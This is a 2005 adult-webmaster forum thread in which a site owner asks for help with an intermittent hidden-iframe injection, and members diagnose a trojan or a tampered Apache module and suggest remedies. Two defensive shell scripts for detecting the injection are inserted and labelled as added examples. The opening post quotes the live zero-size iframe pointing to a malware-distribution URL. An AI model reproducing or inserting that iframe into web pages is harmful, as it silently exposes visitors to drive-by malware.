Welcome to the GoFuckYourself.com - Adult Webmaster Forum forums.

Old 05-10-2005, 06:00 AM   #1
jamie55
Registered User
 
Join Date: Sep 2002
Posts: 50
Site possibly got hacked

Hi,

I'm having some major problems with my site www.jamies-galleries.com . I am using Comus Thumbs and UCJ.

This code: <iframe src="http://iframedollars.biz/dl/adv514.php" width=0 height=0></iframe>

is randomly added to my mainpages, I've checked my templates and the code is not there. It appears and disappears every X minutes, doesn't seem like a pattern to me, just random.

My host can't find anything on my server, and the author of Comus has checked too, he found nothing. I've added a firewall to my server which only allows me to access via FTP, I've also changed all my passwords - so there's no way anyone can get in manually. There has to be a script on the server somewhere, but can't find it ...

I'm losing traffic and prod as we speak, if anyone has any experience with the same stuff, please reply asap as I really need your help!

Thanks for reading!

Regards,
Jamie
Old 05-10-2005, 06:19 AM   #2
Doc911
Confirmed User
 
Join Date: Feb 2004
Location: If i was up your ass you'd know
Posts: 3,695
Trojan.Anicmoo
Old 05-10-2005, 06:24 AM   #3
Holly
Too lazy to set a custom title
 
Join Date: Jun 2003
Location: Jesusland
Posts: 10,017
Don't click on that link unless you have some kind of AV running.
Old 05-10-2005, 06:26 AM   #4
sixxxthsense
Confirmed User
 
Join Date: Aug 2004
Location: Toronto
Posts: 2,421
Quote:
Originally Posted by Holly
Don't click on that link unless you have some kind of AV running.
2 late hehe ''

i should be fine ;)
Old 05-10-2005, 06:27 AM   #5
sixxxthsense
Confirmed User
 
Join Date: Aug 2004
Location: Toronto
Posts: 2,421
jamie do you use IE to edit comus thumbs pages?
Old 05-10-2005, 06:27 AM   #6
fireorange
Confirmed User
 
Join Date: Jan 2005
Posts: 1,648
Yeah, I noticed it on Saturday.

http://www.gofuckyourself.com/showthread.php?t=464621
Old 05-10-2005, 06:27 AM   #7
Spunky
I need a beer
 
Join Date: Jun 2002
Location: ♠ Toiletville ♠
Posts: 133,940
Relatively harmless..see that on a few sites..do a search ..there was a thread about your site awhile back
Old 05-10-2005, 06:29 AM   #8
Ramster
Confirmed User
 
Join Date: Jul 2002
Location: Ottawa, Canada
Posts: 1,447
Too bad Jamie. Same thing has happened to many others. TommysBookmarks too and I think he said the infection was right in apache on the server.
Old 05-10-2005, 06:30 AM   #9
jamie55
Registered User
 
Join Date: Sep 2002
Posts: 50
Quote:
Originally Posted by sixxxthsense
jamie do you use IE to edit comus thumbs pages?
I use Opera 8.0 to edit Comus.

Regarding what spunky said, I had a kinda same situation to my site a while back, but that was a security breach within comus, that got patched immediately. I take it the same hacker didn't entirely lose contact with my server and can still do shit to it.

I did a search on GFY and found that thehun and sleazydream got attacked by the same stuff, can't get in touch with them unfortunately ...

Any ideas on what to do / check?

Thanks
Old 05-10-2005, 06:30 AM   #10
fireorange
Confirmed User
 
Join Date: Jan 2005
Posts: 1,648
I read somewhere about a hacked up Apache module which inserts the code while serving the surfer the pages.
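Added example, not part of the thread: if a module rewrites pages while serving them, the file on disk stays clean and only the response carries the iframe, so one check is to compare zero-size iframes in a saved response against the file on disk. The file names and sample HTML are constructed; on a real box, save several responses over time, since the injection is reported as intermittent.

```shell
#!/bin/sh
# Added example (not from the thread). File names and sample HTML are constructed.

# Print the src of each <iframe> in file $1 whose width or height is 0.
hidden_iframes() {
    tr '\n' ' ' < "$1" \
      | grep -oiE '<iframe[^>]*>' \
      | grep -iE '(width|height)[[:space:]]*=[[:space:]]*["'\'']?0(px)?(["'\'' />]|$)' \
      | sed -nE 's/.*[sS][rR][cC][[:space:]]*=[[:space:]]*["'\'']?([^"'\'' >]+).*/\1/p' \
      | sort -u
}

# Print hidden-iframe sources found in the served copy ($2) but not on disk ($1).
served_only_iframes() {
    d=$(mktemp); s=$(mktemp)
    hidden_iframes "$1" > "$d"
    hidden_iframes "$2" > "$s"
    comm -13 "$d" "$s"        # lines unique to the served copy
    rm -f "$d" "$s"
}

# Constructed sample: the template on disk is clean, one saved response is not.
demo() {
    dir=$(mktemp -d)
    printf '%s\n' '<html><body><a href="/g1.html">gallery</a>' \
        '<iframe src="/banner.html" width=468 height=60></iframe></body></html>' \
        > "$dir/index.disk.html"
    printf '%s\n' '<html><body><a href="/g1.html">gallery</a>' \
        '<iframe src="/banner.html" width=468 height=60></iframe>' \
        '<iframe src="http://injected.example/adv.php" width=0 height=0></iframe>' \
        '</body></html>' > "$dir/index.served.html"
    served_only_iframes "$dir/index.disk.html" "$dir/index.served.html"
    rm -rf "$dir"
}

demo
```

An empty result on every saved response points away from serve-time injection; a non-empty one means the page is being changed after it leaves the disk.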
Old 05-10-2005, 06:33 AM   #11
jamie55
Registered User
 
Join Date: Sep 2002
Posts: 50
Quote:
Originally Posted by fireorange
Ahh shit, I saw that post now. I'll have my host check apache asap, see if there's anything in there.
Old 05-10-2005, 07:17 AM   #12
jamie55
Registered User
 
Join Date: Sep 2002
Posts: 50
Had my host check apache, he found nothing ... any other clues? I really need help on this!
Old 05-10-2005, 07:26 AM   #13
Barefootsies
Choice is an Illusion
 
Join Date: Feb 2005
Location: Land of Obama
Posts: 42,635
I had a similar problem when I first started my TGP but the problem was the page was going in the wrong directory. Simple and stupid I know, but I had to make sure to delete extra pages, and just keep the ../../whatever.shtml.

Basically what was happening was when it would do a page rebuild, it would use an older page, not the one with the code on it. So every 10-15 minutes I'd get an older version of the page, and through trial and error in the middle of the night found problem was just duplicates, and wrong directory.

Old 05-10-2005, 07:31 AM   #14
Homer
Confirmed User
 
Join Date: Feb 2005
Posts: 6,780
there's a trojan
Old 05-10-2005, 07:32 AM   #15
skillfull
Confirmed User
 
Join Date: Apr 2003
Location: Quebec Calisse
Posts: 4,716
the worst is that guy isn't even doing some nice cash with that

http://iframedollars.biz/dl/stats.php?adv=adv514
Old 05-10-2005, 08:17 AM   #16
fireorange
Confirmed User
 
Join Date: Jan 2005
Posts: 1,648
I can't believe your host hasn't found the problem yet.

Bitchslap c h o o p a for me, I was gonna get a few servers from them last week!
Old 05-10-2005, 08:21 AM   #17
darksoul
Confirmed User
 
Join Date: Apr 2002
Location: /root/
Posts: 4,997
If you have root access to your server, hit me up I'll take a look.
Old 05-10-2005, 08:31 AM   #18
MrVids
i am a meat popsicle
 
Join Date: Jan 2005
Location: Seattle, WA
Posts: 1,070
heya jamie, i know you said your host looked on your box to see what it is but the exploit is 99% for sure a module that was installed on Apache. Tell your host to look for mod_stats.so and see if it exists anywhere on the box and also check to see if it appears in your httpd.conf. i run a couple tgp's, and while i've been fortunate enough to not get hit by this, a good friend of mine has and that is what his hosting co ended up finding.

also, have your hosting co install tripwire. it will do a report of any major files that were edited, so you can research things like this with a little more efficiency.
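Added example, not part of MrVids's post: one way to run the check described above is to list the modules httpd.conf actually loads, compare them with a known-good list, and search the box for the named file. The baseline list, directory layout and the `stats_module` identifier are constructed for the sample; only the file name mod_stats.so comes from the post.

```shell
#!/bin/sh
# Added example (not from the thread). Paths, baseline and sample config are constructed.

# Print "identifier path" for every active (uncommented) LoadModule line in config $1.
loaded_modules() {
    awk 'tolower($1) == "loadmodule" { print $2, $3 }' "$1"
}

# Print loaded modules whose .so file name is missing from baseline file $2
# (one known-good file name per line, e.g. taken from a clean install).
unexpected_modules() {
    loaded_modules "$1" | while read -r name path; do
        base=${path##*/}
        grep -qxF "$base" "$2" || echo "$name $path"
    done
}

# Print every file named $2 below directory $1, whether or not the config loads it.
find_module_file() {
    find "$1" -type f -name "$2" 2>/dev/null
}

# Constructed sample tree: one expected module, one commented out, one unexpected.
demo() {
    root=$(mktemp -d)
    mkdir -p "$root/conf" "$root/libexec"
    printf '%s\n' 'LoadModule rewrite_module libexec/mod_rewrite.so' \
        '#LoadModule status_module libexec/mod_status.so' \
        'LoadModule stats_module libexec/mod_stats.so' > "$root/conf/httpd.conf"
    printf '%s\n' mod_rewrite.so mod_status.so mod_include.so > "$root/baseline.txt"
    : > "$root/libexec/mod_stats.so"
    unexpected_modules "$root/conf/httpd.conf" "$root/baseline.txt"
    find_module_file "$root" mod_stats.so | sed "s|^$root||"
    rm -rf "$root"
}

demo
```

Include files pulled in by the main config need the same pass, and a file found on disk but absent from the config is still worth explaining.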
Old 05-10-2005, 08:35 AM   #19
MrVids
i am a meat popsicle
 
Join Date: Jan 2005
Location: Seattle, WA
Posts: 1,070
whoa, i just checked out who you host with. my buddy that got hacked is also a customer of ch00pa. there must be something inherently insecure about their apache setup. give a shout to their tech Kris, he was working on my buddy's site this weekend.
Old 05-10-2005, 08:35 AM   #20
wdsguy
Ryde or Die
 
Join Date: Dec 2002
Location: California-Shanghai
Posts: 19,568
Your hosting co sucks if they can't find the problem within apache.
Old 05-10-2005, 08:55 AM   #21
jamie55
Registered User
 
Join Date: Sep 2002
Posts: 50
Ok, I've got it confirmed many times now, there is not a problem with apache.

My host says, "the problem is not with apache, it is with the software that runs on apache". hahahahahaha has been working on it for 2 days now.

Quote:
whoa, i just checked out who you host with. my buddy that got hacked is also a customer of ch00pa. there must be something inherently insecure about their apache setup. give a shout to their tech Kris, he was working on my buddy's site this weekend.
Host says my problem is completely different from what Kris was working on this weekend ...

Man this is giving me a headache
Old 05-10-2005, 08:59 AM   #22
BigRod
Confirmed User
 
Join Date: Apr 2005
Location: Vancouver, BC
Posts: 3,685
Get a NEW host!
Old 05-10-2005, 09:00 AM   #23
BigRod
Confirmed User
 
Join Date: Apr 2005
Location: Vancouver, BC
Posts: 3,685
If you want a kick ass host icq me!
Old 05-10-2005, 09:18 AM   #24
jamie55
Registered User
 
Join Date: Sep 2002
Posts: 50
MrVids, could you hit me up on icq: 162863896 , I just wanna ask you some questions, thanks!
Old 05-10-2005, 10:48 AM   #25
SmokeyTheBear
►SouthOfHeaven
 
Join Date: Jun 2004
Location: PlanetEarth MyBoardRank: GerbilMaster My-Penis-Size: extralarge MyWeapon: Computer
Posts: 28,609
hmmmmmm m

Last edited by SmokeyTheBear; 05-10-2005 at 10:49 AM..
Old 05-10-2005, 11:31 AM   #26
Ramster
Confirmed User
 
Join Date: Jul 2002
Location: Ottawa, Canada
Posts: 1,447
Maybe your box was rooted. Check in any /tmp for anything owned by root. I also read that your root crontab for the html generator is a way a hacker might have gained access.
Old 05-10-2005, 11:52 AM   #27
fireorange
Confirmed User
 
Join Date: Jan 2005
Posts: 1,648
Seriously though, once you're hacked, you gotta format the server and re-install everything.

No doubt he's already installed a rootkit so you'll never be able to get rid of him.